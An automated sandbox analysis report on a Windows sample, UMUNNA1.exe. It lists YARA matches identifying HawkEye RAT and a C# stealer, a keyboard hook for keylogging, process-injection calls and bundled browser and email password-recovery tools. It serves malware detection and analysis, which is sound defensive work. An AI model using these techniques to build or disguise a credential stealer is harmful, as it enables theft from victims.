Source: Yara match	File source: 4.2.UMUNNA1.exe.839c0d.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UMUNNA1.exe.3d8fe4e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UMUNNA1.exe.838208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UMUNNA1.exe.3d96256.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UMUNNA1.exe.3d97c5b.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UMUNNA1.exe.2b88df0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.922393547.0000000002B61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UMUNNA1.exe PID: 6940, type: MEMORY
Source: Yara match	File source: Process Memory Space: UMUNNA1.exe PID: 5052, type: MEMORY

Contains functionality to log keystrokes (.Net Source)

Show sources

Source: 4.2.UMUNNA1.exe.830000.1.unpack, Form1.cs

.Net Code: HookKeyboard

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 5_2_0040AC8A GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,

5_2_0040AC8A

Source: C:\Users\user\Desktop\UMUNNA1.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 4.2.UMUNNA1.exe.88fa72.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.UMUNNA1.exe.88fa72.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.UMUNNA1.exe.3d8fe4e.4.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.UMUNNA1.exe.3d8fe4e.4.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.UMUNNA1.exe.830000.1.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.UMUNNA1.exe.830000.1.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.UMUNNA1.exe.839c0d.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.UMUNNA1.exe.839c0d.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.UMUNNA1.exe.3d8fe4e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.UMUNNA1.exe.3d8fe4e.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.UMUNNA1.exe.838208.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.UMUNNA1.exe.838208.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.UMUNNA1.exe.3d96256.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.UMUNNA1.exe.3d96256.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.UMUNNA1.exe.3d97c5b.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.UMUNNA1.exe.3d97c5b.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.UMUNNA1.exe.2b88df0.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.922393547.0000000002B61000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4_2_04CE5696 NtWriteVirtualMemory,	4_2_04CE5696
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4_2_04CE55EE NtResumeThread,	4_2_04CE55EE
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4_2_04CE5546 NtQuerySystemInformation,	4_2_04CE5546
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4_2_04CE5669 NtWriteVirtualMemory,	4_2_04CE5669
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4_2_04CE55DC NtResumeThread,	4_2_04CE55DC
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4_2_04CE5534 NtQuerySystemInformation,	4_2_04CE5534
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,	6_2_00408836

Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_005447D6	0_2_005447D6
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB5180	0_2_04DB5180
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB79B0	0_2_04DB79B0
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB10D3	0_2_04DB10D3
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB34D2	0_2_04DB34D2
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB10EB	0_2_04DB10EB
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB108A	0_2_04DB108A
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0883	0_2_04DB0883
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB14B7	0_2_04DB14B7
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB08B6	0_2_04DB08B6
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB10A0	0_2_04DB10A0
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB105C	0_2_04DB105C
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB144B	0_2_04DB144B
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0C48	0_2_04DB0C48
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB1044	0_2_04DB1044
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB1468	0_2_04DB1468
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0C15	0_2_04DB0C15
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB100F	0_2_04DB100F
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB1027	0_2_04DB1027
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB11F5	0_2_04DB11F5
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB15E9	0_2_04DB15E9
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB09E4	0_2_04DB09E4
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB1196	0_2_04DB1196
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0D8C	0_2_04DB0D8C
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB2582	0_2_04DB2582
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0DB7	0_2_04DB0DB7
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB11AE	0_2_04DB11AE
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB1152	0_2_04DB1152
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB3D72	0_2_04DB3D72
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB1108	0_2_04DB1108
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB090E	0_2_04DB090E
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0D3D	0_2_04DB0D3D
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB1123	0_2_04DB1123
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0527	0_2_04DB0527
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB06E4	0_2_04DB06E4
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0EE4	0_2_04DB0EE4
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB12BF	0_2_04DB12BF
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB06AB	0_2_04DB06AB
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0E5B	0_2_04DB0E5B
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0E41	0_2_04DB0E41
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB1265	0_2_04DB1265
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB061E	0_2_04DB061E
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB121E	0_2_04DB121E
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0E11	0_2_04DB0E11
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0A15	0_2_04DB0A15
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0606	0_2_04DB0606
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB1236	0_2_04DB1236
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0A2D	0_2_04DB0A2D
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0FD8	0_2_04DB0FD8
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB07C0	0_2_04DB07C0
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0FF2	0_2_04DB0FF2
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB13E7	0_2_04DB13E7
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0792	0_2_04DB0792
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0B97	0_2_04DB0B97
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0F86	0_2_04DB0F86
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0FBB	0_2_04DB0FBB
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0FA3	0_2_04DB0FA3
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB075F	0_2_04DB075F
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0F4F	0_2_04DB0F4F
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0B09	0_2_04DB0B09
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0F39	0_2_04DB0F39
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0B3C	0_2_04DB0B3C
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB1335	0_2_04DB1335
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 0_2_04DB0B21	0_2_04DB0B21
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4_2_003B47D6	4_2_003B47D6
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4_2_04CB6048	4_2_04CB6048
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4_2_04CB5758	4_2_04CB5758
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4_2_04CB7D10	4_2_04CB7D10
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4_2_04CB7098	4_2_04CB7098
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4_2_04CB8068	4_2_04CB8068
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4_2_04CB1DA8	4_2_04CB1DA8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 5_2_00404DDB	5_2_00404DDB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 5_2_0040BD8A	5_2_0040BD8A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 5_2_00404E4C	5_2_00404E4C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 5_2_00404EBD	5_2_00404EBD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 5_2_00404F4E	5_2_00404F4E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00404419	6_2_00404419
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00404516	6_2_00404516
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00413538	6_2_00413538
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_004145A1	6_2_004145A1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_0040E639	6_2_0040E639
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_004337AF	6_2_004337AF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_004399B1	6_2_004399B1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_0043DAE7	6_2_0043DAE7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00405CF6	6_2_00405CF6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00403F85	6_2_00403F85
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00411F99	6_2_00411F99

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 00413F8E appears 66 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 00413E2D appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 00442A90 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 004141D6 appears 88 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 00411538 appears 35 times

Source: UMUNNA1.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UMUNNA1.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: UMUNNA1.exe, 00000000.00000000.654277775.00000000005EC000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamecremosso.exe4 vs UMUNNA1.exe
Source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs UMUNNA1.exe
Source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs UMUNNA1.exe
Source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemailpv.exe< vs UMUNNA1.exe
Source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamePhulli.exe0 vs UMUNNA1.exe
Source: UMUNNA1.exe, 00000000.00000002.670132115.0000000002BD1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameLkdsrfgj.exe" vs UMUNNA1.exe
Source: UMUNNA1.exe, 00000000.00000002.670132115.0000000002BD1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameavimvIb.dll0 vs UMUNNA1.exe
Source: UMUNNA1.exe, 00000000.00000002.672498554.0000000004E50000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs UMUNNA1.exe
Source: UMUNNA1.exe, 00000000.00000002.673122435.0000000005000000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs UMUNNA1.exe
Source: UMUNNA1.exe, 00000004.00000002.919565130.000000000045C000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamecremosso.exe4 vs UMUNNA1.exe
Source: UMUNNA1.exe, 00000004.00000002.922393547.0000000002B61000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs UMUNNA1.exe
Source: UMUNNA1.exe, 00000004.00000002.919876218.00000000008B2000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamePhulli.exe0 vs UMUNNA1.exe
Source: UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs UMUNNA1.exe
Source: UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamemailpv.exe< vs UMUNNA1.exe
Source: UMUNNA1.exe, 00000004.00000002.926040527.0000000006F80000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs UMUNNA1.exe
Source: UMUNNA1.exe, 00000004.00000002.924052820.0000000004FA0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs UMUNNA1.exe
Source: UMUNNA1.exe	Binary or memory string: OriginalFilenamecremosso.exe4 vs UMUNNA1.exe

Source: UMUNNA1.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 4.2.UMUNNA1.exe.6810000.11.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.UMUNNA1.exe.66c0000.10.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.UMUNNA1.exe.88fa72.3.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 4.2.UMUNNA1.exe.88fa72.3.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.UMUNNA1.exe.3d8fe4e.4.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0.2.UMUNNA1.exe.3d8fe4e.4.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.UMUNNA1.exe.3d8fe4e.4.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.UMUNNA1.exe.830000.1.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 4.2.UMUNNA1.exe.830000.1.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.UMUNNA1.exe.830000.1.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.UMUNNA1.exe.839c0d.4.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 4.2.UMUNNA1.exe.839c0d.4.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.UMUNNA1.exe.3d8fe4e.4.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0.2.UMUNNA1.exe.3d8fe4e.4.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.UMUNNA1.exe.3d8fe4e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.UMUNNA1.exe.838208.2.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 4.2.UMUNNA1.exe.838208.2.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.UMUNNA1.exe.838208.2.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.UMUNNA1.exe.2ba7f28.5.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.UMUNNA1.exe.3d96256.5.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0.2.UMUNNA1.exe.3d96256.5.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.UMUNNA1.exe.3d96256.5.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.UMUNNA1.exe.3d97c5b.3.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0.2.UMUNNA1.exe.3d97c5b.3.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.UMUNNA1.exe.3d97c5b.3.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.UMUNNA1.exe.2b88df0.6.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.UMUNNA1.exe.2b88df0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.925540625.00000000066C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.925557781.0000000006810000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.922393547.0000000002B61000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research

Source: UMUNNA1.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: UMUNNA1.exe, VfCDGxLCwNyRp5SyIH/gghGWtpj6HnkevlTcY.cs	Cryptographic APIs: 'CreateDecryptor'
Source: UMUNNA1.exe, VfCDGxLCwNyRp5SyIH/gghGWtpj6HnkevlTcY.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.UMUNNA1.exe.540000.0.unpack, VfCDGxLCwNyRp5SyIH/gghGWtpj6HnkevlTcY.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.UMUNNA1.exe.540000.0.unpack, VfCDGxLCwNyRp5SyIH/gghGWtpj6HnkevlTcY.cs	Cryptographic APIs: 'CreateDecryptor'
